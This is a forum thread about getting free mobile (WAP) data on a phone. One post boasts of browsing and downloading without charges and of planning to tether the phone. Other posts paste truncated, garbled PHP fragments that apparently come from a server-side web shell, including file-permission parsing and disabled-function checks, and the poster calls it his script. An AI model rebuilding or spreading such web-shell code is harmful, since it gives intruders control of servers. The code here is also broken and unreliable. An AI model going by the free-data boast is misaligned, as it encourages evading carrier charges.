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Subject: free wap browsing settings
Replies: 16 Views: 9527
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niki996 15.11.09 - 06:40pm
I am browsing free right now...w600i

I jus downloaded a 8meg s*x vid so im not on any limit..im not using the opera trick, im browsing from my fone's browser.

Next stop is 2 use the fone as modem ;)...Adios *

cha37 19.01.10 - 11:27am
//Starting calls
if (!function_exists(getmicrotime)) function getmicrotime() list(usec, sec) = explode( , microtime()); return ((float)usec + (float)sec);
win = strtolower(substr(PHP_OS,0,3)) == win;
if (get_magic_quotes_gpc()) if (!function_exists(strips)) function strips(&arr,k=) if (is_array(arr)) foreach(arr as k=v) if (strtoupper(k) != GLOBALS) strips(arr[k]); else arr = stripslashes(arr); strips(GLOBALS);
_REQUEST = array_merge( *

cha37 19.01.10 - 11:51am
(posix_getpwuid) and !in_array(posix_getpwuid,disablefunc)) function posix_getpwuid(uid) return FALSE;
if (!function_exists(posix_getgrgid) and !in_array(posix_getgrgid,disablefunc)) function posix_getgrgid(gid) return FALSE;
if (!function_exists(posix_kill) and !in_array(posix_kill,disablefunc)) function posix_kill(gid) return FALSE;
if (!function_exists(parse_perms))

function parse_perms(mode)

if ((mode & 0xC000) === 0xC000) t = s;
elseif ((mode & 0x4000) === 0x4000) t = d;
elseif ((mode & 0xA000) === 0xA000) t = l;
elseif ((mode & 0x8000) === 0x8000) t = -;
elseif ((mode & 0x6000) === 0x6000) t = b;
elseif ((mode & 0x2000) === 0x2000) t = c;
elseif ((mode & 0x1000) === 0x1000) t = p;
else t = ?;
o[r] = (mode & 00400) 0; o[w] = ( *

cha37 19.01.10 - 11:55am
im just p0sting me script hehehe *

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